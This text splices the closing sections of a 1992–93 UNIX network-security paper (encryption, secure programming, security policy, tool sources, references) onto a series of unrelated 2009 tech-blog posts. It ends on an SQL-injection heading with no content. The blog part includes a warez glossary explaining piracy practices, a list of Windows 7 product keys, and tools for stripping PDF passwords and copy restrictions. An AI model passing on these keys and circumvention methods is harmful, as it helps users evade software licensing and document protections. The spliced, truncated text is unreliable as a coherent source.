Users should get into the habit of encrypting sensitive files whenever they are stored in a public place or transmitted via public communication circuits. File encryption isn't bulletproof, but it is better than clear text for sensitive information. The UNIX crypt utility is the least secure of these tools, since it can be broken using well-known decryption techniques. The UNIX des utility (US export restriction apply) is more secure. It has not been known to be broken, however DoD does not sanction its use for transmitting classified material. A new UNIX tool PGP 2.2 is available (uses RSA encryption), however there may be licensing issues to be concerned with.

3.5.7 Secure Programming Methods

Programmers can assist in the effort of security by reducing the chance that a potential intruder can exploit a hole or bug that is coded into locally developed software. There is probably a lot that can be said about this, and their are probably many books on the subject somewhere. But, here are some common recommendations: (a) Never create a SETUID shell script. There are well-known techniques used by intruders to gain access to a shell program that is running as root; (b) List the complete file name, including the full path in any system() or popen() call; and (c) Since there is no reason for users to have read access to a SETUID file (or any exectuble for that matter), set permissions to 4711 (SETUID) or 711 (Non-SETUID).

3.5.8 Counterintelligence

To extend your security program to seek out, identify, and locate intruders; you may want to modify some of the security tools (especially those proxy service daemons and event-driven auditors) to trace intruders back to their source, and otherwise maintain logs of data on intrusion attempts. This information can prove vital in taking an offensive stance against security break-in's and can help prosecute offenders.

3.5.9 Other Possibilities

Depending on your requirements you might look into specialized solutions such as Compartmented Mode Workstations (CMW), end-to-end Data Link Encryption (STU-III, Motorola NES, and XEROX XEU are examples), and TEMPEST. The NCSC (Rainbow Series) and ITSEC specifications can help you define what level of need you have for security and help lead you to additional types of solutions.

3.6 SECURITY POLICY

Everything discussed in layers {1...5} (sections 3.1 to 3.5) above involve specific things you can do, tools and techniques to implement, to address a particular area or "hole" in security. Your SECURITY POLICY is what ties all of that together into a cohesive and effective SECURITY PROGRAM. There are many diverse issues to consider when formulating your policy, which alone is one of the biggest reasons why you must have one:

         What are the functional requirements of your
        network?

       How secure do you need to be?  What needs to
        be protected?

       How will you handle incident reporting and
        prosecution?

       What does the law require you to do?  What
        about privacy?  Since break-ins often occur
        via multiple hops on computers throughout the
        US and the rest of the world, you will need
        to consider a variation of federal, state,
        local, as well as foreign laws.

       Make security a dedicated and deliberate
        effort.

       User training and security awareness.

       What is considered acceptable use for users? 
        Do the users understand what it is they are
        permitted to do and what it is they are not
        permitted to do?

       What is considered acceptable use for system
        administration staff?  Is using Crack to test
        passwords okay?  Is giving friends outside
        the organization accounts okay?

       Maintain a working relationship with the
        Computer Emergency Response Team (CERT) at
        Carnegie Mellon University (CMU) and your
        Forum of Incident Response and Security Teams
        (FIRST) regional representative "CERT" team.

       PLUS a myriad of different issues too
        numerous to go  into in a summary paper.

By answering these questions you determine what packages and methods in layers {1...5} (or their equivalent) that you want to implement, and in what ways you want to modify or configure them. "A security policy is a formal specification of the rules by which people are given access to a computer and its resources." (and to extend that to say...a network and its resources). Whatever tools you install to help you maintain the security of your network and monitor it, they must be configured to implement YOUR POLICY, or else they are not doing the whole job that needs to be done. Therefore, you must first have a POLICY.

For additional help in the area of policy development, contact cert@cert.org. They can direct you to useful documentation on the subject and guide you to your FIRST regional CERT team representative. A good starting point is Request For Comments (RFC) 1244 "Site Security Handbook" (96 pages), which is available via anonymous FTP from numerous RFC archive sites (for example: nic.ddn.mil).

4. SUMMARY OF AVAILABILITY

Section   Name           Availability

3.2       Router         Cisco, Wellfleet, Proteon
3.3.1     Tcp_wrapper    cert.org:/pub/tools/tcp_wrappers
3.3.2     Socks          s1.gov:/pub/socks.tar.Z
3.3.3     Kernel_wrap    eecs.nwu.edu:/pub/securelib
3.3.4     Swatch         sierra.stanford.edu:/pub/sources
3.3.5     CAP            e-mail to thompsond@orvb.saic.com
3.3.6     Mail Gateway
3.3.7     Tty_wrapper
3.3.8     HSC-Gatekeeper e-mail to Herve.Schauer@hsc-sec.fr
3.3.9     AT&T INET      e-mail to ches@research.att.com
3.4.1     COPS           cert.org:/pub/tools/cops
3.4.2     Chkacct        cc.perdue.edu:/pub/chkacctv1.1.tar.Z
3.4.3     Crack          cert.org:/pub/tools/crack/crack_4.1-tar.Z
3.4.4     Shadow         comp.sources.misc (jfh@rpp386.cactus.org).
3.4.5     Passwd+        dartmouth.edu:/pub/passwd+tar.Z
3.4.6     Audit          e-mail to bjorn@sysadmin.com
3.4.7     Miro           e-mail to miro@cs.cmu.edu
3.5.1     Key-card       e-mail to cert@cert.org
3.5.2     TIS/PEM        e-mail to pem-info@tis.com
3.5.3     Kerberos       athena-dist.mit.edu:/pub/kerberos5
3.5.4     Private-key    contact Don Davis, at Geer Zolot Assoc.
3.5.5     MLS            contact your UNIX vendor
3.5.6     File encrypt   contact your UNIX vendor
3.5.7     Programming
3.5.8     Counter-Intel
3.5.9     Other Poss.    research and contact various vendors
3.6       Policy         RFC 1244 and cert@cert.org

5. ADDITIONAL SOURCES OF INFORMATION

There are several primary sources of information that you can tap into (and correspond with) to keep up to date with current happenings in the general network security and in specific the "firewall" community. I recommend subscribing to the following mailing lists: (a) cert-advisory-request@cert.org; (b) cert-tools- request@cert.org, and (c) firewalls@greatcircle.com. In addition to that read and participate in the following USENET newsgroups: (a) comp.security.announce (which echos the CERT advisory mailing list); (b) comp.security.misc; (c) alt.security (frequently dissolves into "flame wars"); (d) comp.risks; and (e) comp.virus (almost exclusively for discussing PC and MAC viruses). Also, you can copy files from the CERT USENET Clipping Archive via anonymous FTP from cert.org.

CERT Contact Information:
Emergencies:   +1 412 268-7090
FAX:           +1 412 268-6989
E-mail:        cert@cert.org

U.S. Mail:     CERT Coordination Center
             Software Engineering Institute
             Carnegie Mellon University
             4500 Fifth Avenue
             Pittsburgh, PA 15213-3890, USA

USENIX Papers are available directly from USENIX:

The USENIX Association
2560 Ninth Street, Suite 215
Berkeley, CA 94710, USA

6. Acknowledgements

The author extends thanks to several of the authors of the tools discussed in this paper and others for providing feedback that effected several changes in the first couple drafts of this paper. This includes but, is not limited to the following: Ed DeHart (CERT), Jim Ellis (CERT), David and Michelle Koblas (SOCKS), Herve Schauer (Gatekeeper), Dan Farmer (COPS), D. Brent Chapman (firewalls@greatcircle.com), and Matt Bishop (Editor).

7. References

[1]  S. Carl-Mitchell and John S. Quarterman, Building Internet   
     Firewalls. UnixWorld; February, 1992; pp 93-102.

[2]  Wietse Venema.  TCP Wrapper: Network Monitoring, Access
     Control and Booby Traps.  USENIX Proceedings, UNIX Security
     Symposium III; September 1992.

[3]  David and Michelle Koblas.  SOCKS.  USENIX Proceedings, UNIX
     Security Symposium III; September 1992.

[4]  William LeFebvre.  Restricting Access to System Daemons Under
     SunOS.  USENIX Proceedings, UNIX Security Symposium III;
     September 1992.

[5]  D. Brent Chapman.  Network (In)Security Through IP Packet
     Filtering.  USENIX Proceedings, UNIX Security Symposium III;
     September 1992.

[6]  Stephen E. Hansen and E. Todd Atkins.  Centralized System
     Monitoring with Swatch.  USENIX Proceedings, UNIX Security
     Symposium III; September 1992.

[7]  J. David Thompson and Kate Arndt.  A Secure Public Network
     Access Mechanism.  USENIX Proceedings, UNIX Security Symposium
     III; September 1992.

[8]  Herve Schauer.  An Internet Gatekeeper.  USENIX Proceedings,
     UNIX Security Symposium III; September 1992.

[9]  William Cheswick.  The Design of a Secure Internet Gateway.   
     Murray Hill, NJ:  AT&T Bell Laboratories.

[10] Garfinkel, Simson, and Gene Spafford.  Firewall Machines.   
     Practical UNIX Security.  Sabastopol, CA: O'Reilly and
     Associates, Inc., 1991.

[11] Shabbir J. Safdar.  Giving Customers the Tools to Protect
     Themselves.  USENIX Proceedings, UNIX Security Symposium III;
     September 1992.

[12] John F. Haugh, II.  Introduction to the Shadow Password Suite.   
     USENIX Proceedings, UNIX Security Symposium III; September
     1992.

[13] Matt Bishop.  Anatomy of a Proactive Password Checker.  USENIX
     Proceedings, UNIX Security Symposium III; September 1992.

[14] Bjorn Satdeva.  Audit: A Policy Driven Security Checker for a
     Heterogeneous Environment.  USENIX Proceedings, UNIX Security
     Symposium III; September 1992.

[15] Allan Heydon and J.D. Tygar.  Specifying and Checking UNIX
     Security Constraints.  USENIX Proceedings, UNIX Security
     Symposium III; September 1992.
   
[16] James M. Galvin and David M. Balenson.  Security Aspects of a
     UNIX PEM Implementation.  USENIX Proceedings, UNIX Security
     Symposium III; September 1992.

[17] Don Davis.  Network Security Via Private-Key Certificates.   
     USENIX Proceedings, UNIX Security Symposium III; September
     1992.

------------------------NOTICE---DISCLAIMER------------------------
The contents of this paper do not necessarily reflect the opinions of my employer or anyone else that I know. Nothing in this paper should be construed as a product endorsement. No warranty is expressed or implied. Any comments? Please send me e-mail. -------------------------------------------------------------------

------------------------NOTICE---COPYRIGHT-------------------------
(c) Copyright 1992,1993 Robert B. Reinhardt. This paper may be distributabed freely as long as the paper is not modified in any way, includes this notice, and is provided without guarantee or warranty expressed or implied. E-mail comments to breinhar@access.digex.com

Warez Definitions List

2009-07-11T19:22:00.001+05:30

0-Day - Latest software releases.

0-Sec - Same as above, although the period of time between ripping a game or application and it appearing on a warez site is even shorter.

Ace File - The first file in a series of compressed archives (the one you double click on to decompress all the files at once).

Active List - Similar to a mailing list, but uses ICQ to send instant messages to subscribers.

Alpha - Software receives this label when it is in the very early stages of development. Usually full of bugs, so don't touch it with a barge pole.

Anti-Leech - A system which uses cgi scripts to prevent people stealing links and then taking the credit for uploading the files.

Appz - Short for applications. For example Flash 5 or GoLie 5.5.

ASF File - The worst quality movie file format (still pretty good though), much smaller in size than dat or mpg.

Banner Site - Password and username restricted FTP site. To get the correct login details you must click on several banners.

Beta - Refers to an almost finished piece of software that is released to the public for bug testing.

BSA - An acronym for Business Software Alliance, an organisation who are responsible for enforcing anti-piracy litigation. Similar groups in charge of controlling software "theft" include the SIIA, SPA and ELSPA.

BSOD - Many people read about BSODs on bulletin boards and think that they're being insulted, but there is no need to get paranoid. It is actually an acronym for "Blue Screen Of Death". These can occur for a multitude of reasons (old Bill likes to keep us guessing!) and are the bane of PC user's lives.

Bulletin Board - A virtual meeting place on the web similar to a chat room except that it isn't in real time. One person leaves a message then others come along, read it and add a reply. Each new discussion is called a new topic or thread and has it's own link. Whenever a new topic is created the older topics are pushed one place downwards in the list. When someone replies to an older topic it is brought back to the top of the list.

C?? File - File extension that indicates that a file is part of an .ace or .rar series of compressed files.

Cgi Scripts - These are referrers which are used in url’s. When you click on a link with a ?cgi reference you are directed to a sponsor’s website or an anti-leech protected file.

Cookie - A tiny text file (usually less than 1kb), which is stored on your hard drive when you visit a web site. These are used to remember who you are so that you can access members only areas on the site without having to type in a password every time or to retain your personalised settings so that they are available the next time you visit.

Courier - Someone who is involved in the logistics of delivering new releases directly from the release groups themselves to FTP sites.

Crack - A tiny executable file that is used to transform a shareware program into the full version. Also used to remove any copy protection from the main executable of games (this will already have been done in "ripped" warez games).

CRC Error - These can occur when you try to decompress a file that has become corrupt during the downloading process, usually as a result of too much resuming.

Credits - The amount of data you are permitted to download from a ratio site. The more credits you have the more software you are allowed to download.

DAP - A quick way of referring to "Download Accelerator Plus", a free download manager that claims to speed up file transfers by up to three hundred per cent. It works by making multiple connections to the same file and is paid for by revolving advertising banners.Also supports resume.

DAT File - File format used for movies, identical in quality and size to mpg as far as I can tell.

DC - The lazy way of referring to the Dreamcast, Sega's latest console incarnation.

Decompression - Unpacking many files that have been stored in a single archive.

Distro - A concise means of referring to a distribution FTP site. These are huge storage areas which act as a springboard for the transfer of new releases. Their whereabouts are never public disclosed to aid their survival rate. You can think of them as the initial source from which warez emanates.

Direct Downloads - Links to actual files rather than other warez sites or pages. These are usually gathered together from many different sites and put on one page for your convenience.

DivX - Movies ripped from a DVD using the DivX video codecs. Can be played back using Media Player.

DIZ File - Short for description. Very brief text file found in warez archives stating the title of the software, the number of files that makes up the set and the group who released it.

Download (or DL) - Copying files from a web server or FTP site to your computer using a modem.

Emulator - An application that simulates another computer system or console using your PC.

FAQ - Stands for Frequently Asked Questions.

FAW - Abbreviation for "Files Anywhere", a popular, free web storage service.

File Transfer Protocol (FTP) - The method used to transfer files from one computer to another using a modem.

Filler - Refers to a person who uploads stuff to pub for others to download.

Flaming - A general net term for "verbally" attacking someone. This can be done via email, bulletin board, chat room or any medium which involves communication across the web.

Freedrive - Virtual hard drive storage area on the web. Free to join and anything and everything can be uploaded or downloaded.

Freeware - Unrestricted software that is downloaded from the net and is completely free to use. Often paid for using advertising.

FTP Client / Browser - A program used to access, upload and download data from FTP sites.

FXP - File eXchange Protocol - This refers to server to server transfer. You can transfer files from one pub to another using very little of your own bandwidth. This is by far the best means for distributing large files, only problem is that a very limited number of FXP capable pubs exist.

Gamez - Pretty self-explanatory this one.

Getright - One of the best download managers available.

Gold - A piece of software is said to have gone gold when the final version is complete and it is ready to ship to the public.

Gozilla - Another excellent download manager.

Hacking - Gaining access to a remote computer without the authorisation to do so. Usually for the purposes of stealing confidential information or the malicious destruction of data.

Hammering - Repeatedly trying to access an FTP site using an FTP client or download manager.

HTTP - Stands for "Hypertext Transfer Protocol". The method you use to view a web page. Always comes before the address of a website in your Url bar.

ICQ - Derives from the term "I Seek You" and is used for real time chat and transferring files over the internet.

IP - 32 bit binary number identifying the position of a computer on the Internet - similar to the URL. The URL is usually easier to remember as it is alpha based rather than numerical.

IP Range - usually referred to when talking about scanning a particular range of ip addresses. They can be broken down into A, B, and C ranges - AAA.BBB.CCC.xxx. Usually an entire B range will be scanned at a time.

IRC - Stands for "Instant Relay Chat". Used for real time chat and transferring files over the Internet.

ISO - An exact copy of an original CD, all the multimedia bits and pieces are uncut and therefore they are extremely large and awkward to download.

Java - Html scripts used to add functionality to or bring web pages alive. These include animation (such as the title graphic on my main page), menus, chat rooms, buttons, pop ups and so on.

KBps - Kilobytes per second - This is what most transfer speed are referring to. One Byte is comprised of 8 Bits.

Kbps - Kilobits per second - This is what most modem speeds are referring to. Why? Probably to make them look faster. Divide by 8 to get KBps.

Key Generator - A tiny executable program that is capable of creating a serial number from a specified username. These are specific to particular applications or utilities, so a serial number created with one key generator will only work for the program for which the key generator was developed.

Lamer - An annoying and overused general derogatory term used to insult/put down anyone and everything.

Leeching - Downloading files without giving anything back in return or copying other people’s links.

Mirror - An exact copy of a web site that is stored on a different server. Using multiple locations for warez sites allows the site to be accessed using a different address if the main site is deleted.

Modchip - Very common website sponsor found on warez sites. They don’t mind their banners being used on illegal software sites because their products are one of the “grey areas” of the law. Modchips are small pieces of electronic circuitry which allow copied games to be played on your Playstation. If a Playstation has been fitted with a Modchip it is said to have been "chipped".

MP3 File - Compressed music file format. Average track size is between 3 and 4 meg compared to 40-ish meg in wav format.

MPG File - The best quality and largest movie file format.

Multi Web Space Faker - A tool used to create lots of free web space accounts simultaneously.

Name Zero - An organisation that offers free website domain names. The main drawbacks are that you have to put up with a very bulky banner residing at the bottom of your page and the fact that you never actually own your chosen address.

NFO File - Short for info or information. Basic text file containing all the important details relating to a particular release, such as number of files, release date, copy protection system, installation instructions etc.

Nuked - A release is said to be nuked if it is completely unplayable. Usually when this happens another group re-releases the particular game, although fixes do sometimes follow on to rescue the game from trash can.

OEM - An acronym for Original Equipment Manufacturer. OEM software products are repackaged versions of the full retail product. They are often re-branded to suit the needs of the particular vender and are much more reasonable priced because they lack excessive packaging and a hard copy of the manual.

OST - Not strictly a warez term this one, but one that you are likely to come across while searching for MP3 music. It stands for original soundtrack (movie music).

Patch - We all know games and applications aren't perfect. When they are released we would hope that they have been thoroughly tested for bugs and incompatibility problems, but you can guarantee that many of these will still slip through the quality control net. Once the program is released to the general public, the bug reports start to flood in. A patch is a downloadable executive file which takes these reports into account and attempts to incorporate all the fixes for these known problems. A patch can resolve incompatibility problems, prevent crashes or improve the performance of a piece of software.

Piracy - The replication and distribution of videos or computer software.

Pop-ups - Irritating browser windows that open automatically when you visit a warez site. Usually contain voting portals or porn sites.

Port - A port is a term used when referring to FTP sites and is an essential extension of the address used to access them. If the port number of an FTP site isn't specified the default setting of 21 will automatically be used.

Pron - A long time ago in a galaxy far, far away someone posted a request for porn on a bulletin board, only, because of a typing error what he ended up asking for was "pron". Since then this has become a bit of a running joke and so it is now deliberately misspelt.

Proxy - A third party server which acts as an anonymous go between whenever you request a web page or contact a remote server. The message from your computer is first sent through the proxy server before being relayed to the final destination so that it appears as though the request has come from the IP address of the proxy server rather than you. Used when you wish to maintain your privacy on the net or speed up your connection (much more detailed info on this subject in the "more tips" section).

Psx - A quick way of referring to the Sony Playstation.

Pub - A free for all FTP site where anonymous access is permitted. They are usually used for transferring large files to many people because of their high speeds.

Pub Scanner - Someone who scours the net for anonymous access FTP sites which permit the creation and deletion of files. These are then exploited by uploading software for others to share.

Pub Stealer - Someone who posts the IP address of a public FTP site which they themselves have not built. Some pub stealers justify this by claiming that the elitism of private FXP groups discriminates against those people who do not have access, yet others simply post other people's work to try to claim the credit for themselves. Either way though, pub stealers are despised by the FXP groups and praised by those who would otherwise not have access to them.

Rar File - The first file in a series of compressed archives (the one you double click on to decompress all the files at once). Usually decompressed using a program called Winrar.

Release Groups - A group of people who are involved in cracking and / or ripping software and then repackaging it into easily downloadable segments.

Ratio - Two numbers separated by a semi-colon. Indicates how much data you must upload to an FTP site before you are permitted to download anything.

Reg File - Tiny file that adds essential configuration details into the registry.

Resume - The ability to stop and start downloading / uploading a file whenever you choose without having to start from the beginning again.

Rip - Software that has had all the non-essential gubbins removed to reduce its size. Videos and music are always the first casualties.

Raped - A release is branded with this term if it has been damaged beyond repair during the ripping process.

RM File - Shorthand for Real Media, a file format used to encode video sequences, which can only be played back using the "Real Player". Video clips produced using this format are not of the highest quality, but do have the advantage of a small file size.

ROM - Games which are designed for other platforms, but are played on the PC using an emulator.

Serial - A valid username and password that is saved as a basic text file and is used to register a shareware program and therefore remove all the restrictions.

Shareware - Try before you buy software downloaded from the net.

Spam - Unsolicited junk e-mail. Supposedly stands for "Stupid Person's Annoying Message".

Sponsor - To make some money webmasters can place adverts on their sites. Each time you click on these adverts or banners they get paid a few cents for bringing potential customers to the sponsors website.

Surfer Friendly (SF) - Surfer friendly sites supposedly have no blind links, pop-ups or porn banners. Don't be fooled by this label though as some sites will tell you fibs to get you to visit them.

Sys Op - The person who has the responsibility for running the computer from which an FTP site has been established. When warez is uploaded to public FTP sites and then suddenly goes "Missing In Action" you can often lay the blame at the door of the Sys Op who has an obligation to make sure his/her server stays within the boundaries of the law (i.e. warez free).

Tag / Tagged - This generally refers to the tagging of a pub. A FXP group uses a directory structure to claim it as their own. A general rule is that if a tag is 2 weeks old and not in use it has been abandoned.

Top List - Chart which lists in rank order the best warez sites. Worked out on the basis of votes.

Trading - Swapping warez, file for file via FTP, ICQ etc. Not usually approved of by the real warez community who believe that warez should be freely distributed. To put it simply, it is not the "warez way".

Trainer - A small, executable program which sits in your taskbar while you play a game. Hotkeys are associated with cheat commands so that when they are pressed you are given extra ammo, weapons, lives or the ability to toggle between invincible/mortal modes etc etc.

Trojans - Nasty virus like attachments which can be merged with executable files. These are tiny so are unlikely to arouse suspicion. When run they allow a hacker to access your computer and wreak havoc. Can occasionally be found in warez files.

UBB - Shorthand for Ultimate Bulletin Board, currently the most popular script used for creating warez bulletin boards.

UBB Hacks - This term falsely gives the impression that something destructive or malicious is involved, but when you hear people talking about a hack in the context of bulletin boards they are simply referring to code which helps to improve the functionality of a board. For example a "thread hack" would effect the way in which individual threads look and operate.

Undeletable Pub - An anonymous access, public FTP site where the permission attributes are set to allow uploads and downloads, but do not permit deletion.

Unzip - Unpacking or decompressing many files that have been stored in a single archive. Technically only used when talking about zip files.

Upload - Copying files from your computer to a web server or FTP site using a modem.

URL - Stands for "Uniform Resource Locator". The web site address you type into your browser.

VCD - Stands for Video Compact Disc. Basically these are huge movie files which can be viewed with the latest version of Media Player.

Voting - Members of the warez scene are very keen to reach the number one slot of top lists such as Voodoo, Top 60 etc. and will therefore encourage you to vote for their site to improve their position and get the credit they deserve (or not as the case may be!).

Warez - "Pirated" Full version software that is uploaded to the internet and is available for free download.

Warez Board - Bulletin board used by the warez community to share links and discuss anything related to warez.

Winace - Another utility used for decompressing all the common archive formats. Not great in my opinion. See below for a better one.

Wingate - Similar to a proxy in that they are used to hide your identity, except all information actually passes through the Wingate, if you have a slow Wingate you get slow download/upload speeds. Wingates are also used to force FXP transfer on pubs that do not normally accept FXP, again all data passes through the Wingate so you need one that is fast for it to be useful.

Winrar - Utility used for decompressing .rar files and much more.

Winzip - An essential tool used to decompress warez files.

Zip - A common compression format used to store warez.

Enabling Remote Desktop in Windows 7/Vista

2009-07-07T23:11:00.006+05:30

In this tutor we guide you, how to allow Windows 7 and Windows Vista Based systems to Enable and test the remote desktop systems.

Though the facility exists in these operating systems it is disabled in it by default(Vista buisness and enterprise editions are exceptions). The procedure to enable in both 7 and Vista are same.

Step by step procedure to Enable Remote Desktop

Step 1. Right-click Computer in the Start menu and then select Properties.

Step 2. Click Remote settings in the Tasks list on the left side of the System window.

Step 3. Select Allow connections from computers running any version of Remote Desktop if computers connecting to it will only be from within a local network or are running versions of Windows other than 7 or Vista.

Note: Here select Allow connections only from computers running Remote Desktop with Network Level Authentication if computers connecting to it will connect from the internet or all computers connecting will be Windows 7/Vista.

Step 4. Click OK to save your changes.

Note: If you’re using the Windows Vista firewall, Remote Desktop will automatically be allowed through it. If you’re using another firewall, you’ll need to open port 3389 to allow Remote Desktop connections.

Selecting Remote Desktop Users

If you have a user account(s) that do not have administrative credentials and you want to use to log in when connecting with Remote Desktop, follow these instructions.

Note: All user accounts with administrative rights are automatically allowed to log in using Remote Desktop.

1. Open the Remote tab in the System Properties window (see instructions above).

2. Click the Select Users button in the Remote tab of the System Properties window.

3. Click Add in the Remote Desktop Users window.

4. Click the Advanced button in the Select Users window.

5. Click the Find Now button.

6. Select the user you want to add to the list of users able to log in with Remote Desktop and then click OK.

7. Click OK in the Select Users window.

Note: Make sure the user you’ve just added is in the object names box.

8. Click OK in the Remote Desktop Users window.

9. Click OK in the System Properties window.

AVG Antivirus 8.5 Free edition download

2009-07-07T23:08:00.000+05:30

AVG Antivirus 8.5 Free Edition is the latest release from the house of AVG that provides basic anti-virus and anti-spyware security protection for Windows 7, Vista and XP.

AVG is very well known and hardly requires any introduction. LinkScanner Active Surf-Shield is a new feature added in this version which checks web pages for threats at the only time that matters – when you’re about to click that link.

Features of AVG Anti-Virus 8.5 Free Edition:

Anti-Virus & Anti-Spyware
LinkScanner Active Surf-Shield
LinkScanner Search-Shield
Security Toolbar
Real-time safe Internet surfing and searching
Compatible with Windows 7, Windows Vista and Windows XP

AVG Antivirus 8.5 Free edition

AVG Anti-Virus Free Edition is only available for single computer use for home and non commercial use. Direct link to download avg_free_stf_en_85_386a1586.exe is given below.
Download AVG Anti-Virus 8.5 Free Edition

Quickly Switching between different operating systems

2009-07-03T22:56:00.004+05:30

Today we are providing a new trick for switching between different Operating systems easily and quickly.

A program named Restart is a system utility for advanced users with more than one operating system installed on their machine. This program installs an icon in the notification area, and with a single click the computer will shutdown and restart with the selected operating system. The program also includes commands to shutdown the computer in different ways (including stand-by and hibernate), a schedule function, and advanced settings for uncommon configurations.
Please note: this program works in conjunction with the Microsoft boot manager, and it is not compatible with other third-party products.
Freeware. For Windows based operating systems.
Added option for disabling the program from running at startup.

Download

Review : Windows 7 Release Candidate Installation

2009-06-25T16:49:00.000+05:30

This review comes 2nd in the series to our previous Review of Windows 7 Beta.

Windows 7 is Microsoft's latest version of Desktop windows operating system. Windows 7 code name "Vienna" is the successor of Windows Vista which did not do well in the market. Windows 7 is believed to the Operating System of the "Next Generation" with full featured touch screen and full high defination multimedia support. Windows 7 is packed with so many features and yet it is not a resource hog as Vista, which makes it a perfect Operating System.

This is a step by setup guide to install Windows 7 RC and some important post installation configuration with all the necessary screenshots. Hope you have a good time reading this guide.

First Install the Windows 7 RC DVD in your DVD drive and reboot your computer. In BIOS, set the DVD drive first boot device. When you see "Press any key to boot from CD/DVD..." press any key to enter the Windows 7 RC installation. Upon boot from DVD you will be greeted with the following screen. It will then create a RAM drive and load all the necessary files required for Windows Setup in the memory and setup continues passing through the following stages.

Once the installation is ready, the following Window will popup and you may proceed with the installation procedure. You can select the language and keyboard settings according to your needs. While i'll continue this guide with English. Click Next to continue and on the next screen press Install Now to install Windows 7 on your computer.

Accept the license agreement and click next. On the next screen Click on "Custom (Advanced)" Option. Select the partition to in which you want to install windows, click on the "Drive Options" Link on the bottom-Left. Some new options will appear. There click on Format and click "Yes". When setup completes formating, Click Next and windows installation will begin. Step wise screenshots below :

During steup Windows says your computer will restart several times, but it restarts only two time. Once the files expanding completes, the computer will reboot and proceed with the installation.

After this the computer will update the registries and start default services required for proceeding with the installation saying Completing Installation. After that the computer will reboot once again.

After the second reboot Windows 7 starts loading and it prepares the computer to boot for the first time. This stage exists in all windows operating system starting from Windows 98 to Windows 7. During this phase of configuration Windows 7 tests the Video Card's performance so as to adujst the Aero feature.

After the congiguration and testing is finished, you will get a screen to enter the Username and the computer name. This screen should also contain the password field, but microsoft made some changes and broke this combination to shift the password field to the next window.

After creater the user account and securing it with a password windows 7 proceeds and asks for Windows 7 CD-Key. The RC version will except any key that were used by the beta version. But the final version will use the CD-Key or the product ket to identify the version of Windows 7 that you have purchased. Never pass your CD-Key to anyone else as that is considered as Piracy. Well the CD-Keys to install the RC version are here : Download Windows 7 RC

You can use any of these keys to install RC. These keys works for both Windows 7 32-bit as well as Windows 7 64- bit.

After entering the product key, you will come to the Automatic Update's setting page. Here select "Use recommended settings" then you need to adjust the date and select your Time Zone. After that you select what type of network you have. Then your computer will be configured according to the network type you select.

Once you get through these steps Windows will finalize and apply all the settings as the default settings of your computer.

Finally, after working so hard, you will get the welcome screen and shortly after windows configures you will be presented with the desktop and windows setup will hand over the computer's control to you...!

What a great sight that is isn't it..!?

Below is how the logon screen of Windows 7 RC looks like. Similar to Vista and beta build of windows 7. The next is the start menu and Right-Click menu.

Here is the Version Details of Windows 7 RC which is Build 7100

Now After installing Windows seven, the first thing i would recommend you to do is, immediately register the windows copy so that you could enjoy problem free access to windows updates.

Further read:

1)Top 20 Windows 7 tips,tricks,tweaks and secrets
2)Enable Telnet Command in Windows 7/Vista

Windows 7 RC Geniune Activation Keys

2009-06-25T16:21:00.004+05:30

Windows 7 RC Build 7100 is now live for public download... You must have a Windows live ID in order to download Windows 7 RC 1 Build 7100. The RC public download will be live till July 2009. Download links :

Download - 32Bit

Download - 64Bit

If you have downloaded Windows 7 Release Candidate version, you will probably need an activation to extend its period more than 30 days. Various tricks were published on some blogs to get activation key for free but the URL provided didn’t work out. Microsoft is giving away some Windows Activation keys to its users so read on to know how to get it.
You can get unlimited number of Windows Seven genuine activation keys from microsoft immediately after reaching the provided URL.

Visit Microsoft TechNet.
Click on Sign In link on the top right corner, and login to Microsoft TechNet with a valid Windows Live ID. You can log in even if you’re not a TechNet subscriber.
Copy and paste the following URL to the address bar of the web browser tab or window used to login to Microsoft TechNet:

List of Product Keys while installing Windows 7 RC which work on Both 32-bit and 64-bit versions :

P72QK-2Y3B8-YDHDV-29DQB-QKWWM
Q3VMJ-TMJ3M-99RF9-CVPJ3-Q7VF3
KBHBX-GP9P3-KH4H4-HKJP4-9VYKQ
6JQ32-Y9CGY-3Y986-HDQKT-BPFPG
9JBBV-7Q7P7-CTDB7-KYBKG-X8HHC
MVYTY-QP8R7-6G6WG-87MGT-CRH2P
MM7DF-G8XWM-J2VRG-4M3C4-GR27X
RGQ3V-MCMTC-6HP8R-98CDK-VP3FM
MT39G-9HYXX-J3V3Q-RPXJB-RQ6D7
MVBCQ-B3VPW-CT369-VM9TB-YFGBP
C43GM-DWWV8-V6MGY-G834Y-Y8QH3
KGMPT-GQ6XF-DM3VM-HW6PR-DX9G8
BCGX7-P3XWP-PPPCV-Q2H7C-FCGFR
6F4BB-YCB3T-WK763-3P6YJ-BVH24
MM7DF-G8XWM-J2VRG-4M3C4-GR27X
KGMPT-GQ6XF-DM3VM-HW6PR-DX9G8
MVBCQ-B3VPW-CT369-VM9TB-YFGBP
KBHBX-GP9P3-KH4H4-HKJP4-9VYKQ
BCGX7-P3XWP-PPPCV-Q2H7C-FCGFR
RGQ3V-MCMTC-6HP8R-98CDK-VP3FM
Q3VMJ-TMJ3M-99RF9-CVPJ3-Q7VF3
6JQ32-Y9CGY-3Y986-HDQKT-BPFPG
P72QK-2Y3B8-YDHDV-29DQB-QKWWM
6F4BB-YCB3T-WK763-3P6YJ-BVH24
9JBBV-7Q7P7-CTDB7-KYBKG-X8HHC
C43GM-DWWV8-V6MGY-G834Y-Y8QH3
GPRG6-H3WBB-WJK6G-XX2C7-QGWQ9
MT39G-9HYXX-J3V3Q-RPXJB-RQ6D7
MVYTY-QP8R7-6G6WG-87MGT-CRH2P

Unlock and remove PDF Editing restrictions

2009-06-18T18:25:00.005+05:30

PDF files are great resource of data and information we need but they may create irritation if it is protected and restricts editing, copying and printing. To remove these annoying restrictions or unlock these PDF files, here are two methods, one is online and another local.

1. Online Method : Free PDF Unlock Online Utility is a web site that allows us to unlock the whole process online. Simply click on Browse … and then Submit your site to process your file and show you a copy of this release:

Free PDF Unlock Online Utility

2. Local Method : PDF Unlocker is a simple and useful application that can remove all kinds of restrictions on PDF files. It works by removing passwords that restrict access in two areas. One is for passwords that restrict some functions such as printing copying and pasting. The second is any password that might prevent you from accessing or opening a PDF file.

Extract Mp3 audio from Youtube videos

2009-06-18T18:23:00.001+05:30

ListenToYouTube is a service that allows us to extract the audio from YouTube and convert to MP3 format. Youtube is the largest source of Music and you will always want to save them on your Mp3 player and listen to them later on. It may happen also happen that Video is not so good but song is melodious so in such cases, you will need only Audio of it or simply as a Mp3 file of same song.

Even though there are many ways to download content, the P2P is perhaps the most popular and used, there is YouTube so large a collection of music and audio of any kind is almost bound to start when looking for new content there.
And so that no difficulty away to less technical users, ListenToYouTube is easy to use: just enter the URL of the video from YouTube. With this service is only manage to extract the audio for download in MP3 format.

A Very Basic View On SQL Injections

